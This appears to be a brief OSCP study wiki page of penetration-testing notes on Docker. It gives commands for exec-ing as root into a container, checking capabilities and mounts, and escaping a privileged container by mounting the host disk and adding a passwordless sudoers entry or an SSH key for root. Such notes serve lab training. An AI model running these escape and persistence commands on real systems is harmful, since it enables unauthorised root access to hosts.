Docker - A1vinSmith/OSCP-PWK GitHub Wiki

exec -i -u root

sudo /snap/bin/docker exec -i -u root e6ff5b1cbc85

### Find container ID
ps aux | grep containerd-shim
ps aux | grep -E "docker|container"

Check for privilege escalation vectors inside the container:

cat /proc/self/status | grep Cap
mount | grep host
ls -la /mnt /media /host 2>/dev/null

If the container is privileged or has CAP_SYS_ADMIN, escape to host:

# Find host filesystem mount
mkdir -p /mnt/host
mount /dev/sda1 /mnt/host  # or similar device

# Modify host files
echo 'boris ALL=(ALL) NOPASSWD: ALL' >> /mnt/host/etc/sudoers
# or add SSH key
cp /root/.ssh/id_rsa.pub /mnt/host/root/.ssh/authorized_keys

Escape by using CAP

Not docker,

But HTB data Grafana - https://hackviser.com/tactics/pentesting/services/grafana#ssrf-via-datasources